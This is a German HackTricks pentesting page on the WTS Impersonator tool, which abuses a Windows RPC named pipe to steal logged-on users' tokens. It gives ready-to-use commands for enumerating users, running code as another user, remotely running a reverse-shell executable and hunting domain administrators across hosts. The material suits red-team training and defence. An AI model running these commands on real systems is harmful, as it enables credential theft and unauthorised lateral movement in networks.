hacktricks/windows-hardening/stealing-credentials/WTS-Impersonator.md

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

• Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
• Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
• Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
• Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
• Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.

Das Tool WTS Impersonator nutzt die RPC-Named Pipe "\pipe\LSM_API_service" aus, um sich heimlich bei angemeldeten Benutzern einzuloggen und ihre Tokens zu übernehmen. Dabei umgeht es herkömmliche Token-Impersonationstechniken. Dieser Ansatz erleichtert nahtlose laterale Bewegungen innerhalb von Netzwerken. Die Innovation hinter dieser Technik wird Omri Baso zugeschrieben, dessen Arbeit auf GitHub zugänglich ist.

Kernfunktionalität

Das Tool arbeitet mit einer Sequenz von API-Aufrufen:

WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW

Schlüsselmodule und Verwendung

• Benutzer auflisten: Mit dem Tool ist eine lokale und entfernte Benutzerenumeration möglich, wobei für beide Szenarien entsprechende Befehle verwendet werden:
• Lokal:

.\WTSImpersonator.exe -m enum

• Remote, durch Angabe einer IP-Adresse oder eines Hostnamens:

.\WTSImpersonator.exe -m enum -s 192.168.40.131

• Befehle ausführen: Die Module exec und exec-remote erfordern einen Service-Kontext, um zu funktionieren. Die lokale Ausführung erfordert lediglich die ausführbare Datei WTSImpersonator und einen Befehl:
• Beispiel für die lokale Ausführung eines Befehls:

.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe

• PsExec64.exe kann verwendet werden, um einen Service-Kontext zu erhalten:

.\PsExec64.exe -accepteula -s cmd.exe

• Remote-Befehlsausführung: Hierbei wird ähnlich wie bei PsExec.exe ein Dienst remote erstellt und installiert, der die Ausführung mit entsprechenden Berechtigungen ermöglicht.
• Beispiel für die Remote-Ausführung:

.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2

• Benutzerjagd-Modul: Zielt auf bestimmte Benutzer in mehreren Maschinen ab und führt Code unter ihren Anmeldeinformationen aus. Dies ist besonders nützlich, um Domänenadministratoren mit lokalen Administratorrechten auf mehreren Systemen anzugreifen.
• Beispiel für die Verwendung:

.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe

Erlernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

• Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
• Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
• Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
• Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
• Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.